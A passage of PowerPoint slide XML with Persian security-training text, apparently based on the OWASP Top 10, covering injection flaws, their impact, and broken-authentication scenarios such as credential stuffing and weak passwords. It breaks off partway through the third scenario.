                        <a:rPr lang="fa-IR" sz="1200" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>نقص</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ar-SA" sz="1200" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t> تزریق زمانی رخ می دهد که مهاجم می تواند داده های خصمانه را به</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1200" kern="1200" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t> مفسر</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ar-SA" sz="1200" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t> ارسال کند.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="+mn-ea"/>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just" rtl="1"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ar-SA" sz="1100" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>حمله تزریق بسیار شایع است، به خصوص در کد میرای. آسیب پذیری های تزریق اغلب در</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" kern="1200" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>Query</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>های </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>SQL</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ar-SA" sz="1100" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>، </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>LDAP</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ar-SA" sz="1100" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>، </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>XPath </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ar-SA" sz="1100" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>یا</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t> NoSQL</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>،</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" kern="1200" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ar-SA" sz="1100" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>کامندهای </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t> OS</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>|،</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" kern="1200" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>پارسر</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ar-SA" sz="1100" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>های </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t> XML</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ar-SA" sz="1100" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>، هدر</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t> SMTP</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ar-SA" sz="1100" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>، زبان بیان و پرس و جوهای</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t> ORM</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" kern="1200" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t> یافت </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" kern="1200" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>میشوند.</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" kern="1200" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ar-SA" sz="1100" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>هنگام </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ar-SA" sz="1100" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>بررسی کد، کشف نقص تزریق آسان است. اسکنرها و </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>فازرها</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" kern="1200" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ar-SA" sz="1100" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>می توانند به مهاجمان برای پیدا کردن نقص تزریق کمک کنند</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>.</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just" rtl="1"/>
                      <a:r>
                        <a:rPr lang="ar-SA" sz="1200" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>تزریق می تواند باعث از دست دادن اطلاعات یا انحراف، عدم پاسخگویی یا رد دسترسی شود. تزریق می تواند گاهی منجر به تصاحب کامل میزبان</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1200" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t> نیز</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ar-SA" sz="1200" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1200" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>گردد</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ar-SA" sz="1200" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>.</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ar-SA" sz="1200" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>تاثیر </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1200" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>تجاری </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ar-SA" sz="1200" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>بستگی به نیازهای محافظت از برنامه و اطلاعات شما دارد.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="+mn-ea"/>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a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>نمونه‌ سناریوهای حمله</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" rtl="1">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="1050" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>سناریو </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1050" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>#1: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Credential stuffing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>، که از لیست های رمزهای عبور شناخته شده استفاده می کند، یک حمله رایج است. اگر برنامه کاربردی محافظت از تهدیدات خودکار یا محافظت از</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Credential stuffing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>را اجرا نکند، برنامه را می توان به عنوان اوراکل رمز عبور برای تعیین اعتبار </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Credentials</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> استفاده کرد.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" rtl="1">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="1050" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>سناریو #2: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>بیشتر حملات احراز هویت به دلیل استفاده مداوم از کلمات عبور به عنوان یک عامل واحد صورت می گیرد. هنگامی که بهترین شیوه ها در نظر گرفته می شود، چرخش رمز عبور و الزامات پیچیدگی به عنوان کاربران تشویقی برای استفاده و استفاده مجدد از کلمه عبور ضعیف مورد توجه قرار می گیرند. در سازمان ها توصیه می شود که این روش ها را در </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>NIST 800-63 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>متوقف کنند و از احراز هویت چند عامل استفاده کنند.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" rtl="1">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="1050" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>سناریو #3: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
